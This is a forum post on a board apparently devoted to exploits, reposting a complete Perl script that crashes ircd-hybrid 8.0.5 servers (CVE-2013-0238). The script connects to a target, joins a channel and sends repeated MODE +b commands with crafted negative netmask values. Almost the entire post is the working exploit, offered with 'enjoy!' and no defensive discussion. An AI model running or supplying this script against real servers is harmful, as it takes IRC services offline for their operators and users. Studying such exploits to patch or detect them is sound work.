OneAnonymous
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Run by Daz
 
HomeGallerySearchLatest imagesRegisterLog inRadio

 

 ircd-hybrid 8.0.5 - Denial of Service

Go down 
AuthorMessage
Daz
Super Admin
Super Admin
Daz


Posts : 41
Points : 136
Join date : 2011-03-02

ircd-hybrid 8.0.5 - Denial of Service Empty
PostSubject: ircd-hybrid 8.0.5 - Denial of Service   ircd-hybrid 8.0.5 - Denial of Service EmptyMon Apr 22, 2013 6:59 am

#!/usr/bin/perl
# ircd-hybrid remote denial of service exploit for CVE-2013-0238
# quick and dirty h4x by kingcope
# tested against ircd-hybrid-8.0.5 centos6
# please modify below in case of buggy code.
# enjoy!

use Socket;

srand(time());
$exploiting_nick = "hybExpl" . int(rand(10000));

sub connecttoserver()
{
$bool = "yes";
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
connect(SOCK1, $paddr) || {$bool = "no"};
}

sub usage() {

print "usage: ircd-hybrid.pl <target> <port>\r\n";
exit;
}

$| = 1;
print "----------------------------------------------------------------------\r\nLets have fun!\r\n";
print "----------------------------------------------------------------------\r\n";

if (!defined($ARGV[1])) {
usage();
}

$ircport = $ARGV[1];
$ircserver = $ARGV[0];

print "Connecting to $ircserver on port $ircport...\n";

connecttoserver();

if ($bool eq "no")
{
print "Connection refused.\r\n";
exit(0);
}

send(SOCK1,"NICK $exploiting_nick\r\n",0);
send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0);

while (<SOCK1>) {
$line = $_;
print $line;
if ((index $line, " 005 ") ne -1) {
goto logged_in;
}

if ((index $line, "PING") ne -1) {
substr($line,1,1,"O");
send(SOCK1, $line, 0);
}
}

logged_in:

print " ok\r\n";

print "Sending buffers...\r\n";
$channelr = int(rand(10000));
send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0);
sleep(1);
$k = 0;
do {
print $_;
$k++;
$crashnum = -1000009 - $k * 1000;
send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0);
} while(<SOCK1>);

print "done\r\n";

# EOF
Back to top Go down
https://oneanonymous.board-directory.net
 
ircd-hybrid 8.0.5 - Denial of Service
Back to top 
Page 1 of 1
 Similar topics
-
» vBulletin 4.0.0 Beta 5 Remote Denial of Service

Permissions in this forum:You cannot reply to topics in this forum
OneAnonymous :: Linux Exploits-
Jump to: